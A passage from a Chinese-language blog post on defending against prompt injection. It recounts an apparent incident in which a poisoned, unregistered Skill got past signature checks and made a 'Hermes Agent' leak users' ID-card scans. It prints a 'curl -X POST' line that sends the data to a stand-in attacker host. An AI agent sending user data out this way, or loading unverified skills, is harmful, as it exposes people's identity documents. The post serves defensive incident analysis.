Prompt 注入攻防实战：Hermes Agent 的 4 类恶意 Skill 识别与自动查杀方案

1. 这不是“AI被忽悠了”，是 Hermes Agent 的 Skill 注入链被攻破了

上周三下午，我们线上灰度环境里一个负责 PDF 证卡拼版的 Hermes Agent 突然开始批量生成带 base64 编码的恶意 payload 文件——它把用户上传的身份证扫描件，悄悄混进了伪造的curl -X POST https://attacker.example.com/leak请求体里。更诡异的是，日志里找不到任何人工触发记录，所有调用都来自一个叫pdf-layout-enhancer的 Skill，版本号显示为v0.2.1，而我们仓库里这个 Skill 的最新稳定版明明是v0.1.9。

我立刻拉出hermes agent logs --since 24h | grep "skill-exec"，发现它在执行前根本没走soul.md的签名校验流程；再查hermes agent list-skills，输出里赫然多出两个未注册的 Skill：pdf-layout-enhancer@malicious和glm4.7flash-bridge。它们没有出现在skills/目录下，却能被hermes agent run正常加载——说明注入点不在文件系统层，而在运行时解析环节。

这不是 Prompt 注入的“玩具级”演示，而是真实发生在生产环境里的 Skill 投毒事件。Hermes Agent 的设计哲学是“S